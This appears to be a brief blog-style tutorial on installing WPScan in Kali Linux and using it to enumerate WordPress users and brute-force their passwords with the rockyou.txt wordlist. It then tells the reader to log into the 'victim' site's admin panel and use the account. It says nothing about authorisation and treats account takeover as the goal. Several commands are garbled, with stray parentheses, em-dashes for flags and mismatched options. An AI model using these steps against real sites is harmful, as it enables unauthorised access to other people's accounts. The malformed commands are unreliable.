Follow the below steps:

Kali Linux is required to scan a website.

Steps to install wpscan in kali:-

1> Open cmd and type ( sudo apt install ruby ruby-dev

2> After installing ruby check gem with this code (gem -v)

3> Sudo gem install wpscan

4> It’s done for scan website


1> First type wpscan —help  command use version plugins and themes               


2>  And also options and examples available on how to scan websites.

Scan Website command:- 

1> wpscan  – -url   (IP address or Full url of victim)

>   so you found the site up or down and running on WordPress or not.

2> wpscan -u (

 > So all information shows about websites like PHP version which server use and many more.

3> How to find users on a website using this code 

Wpscan –url (http://anywebsite/wordpress/) -e u


4> After finding the user how to find password follow this code

     Wpscan -U  http://anywebsite/wordpress/ —wordlist /root/Desktop/rockyou.txt —username (which user you find name type here)

> After password match complete password show.

> Then you open the admin panel any type username or password so you can easily use the account. 

To know more about it and secure your website, visit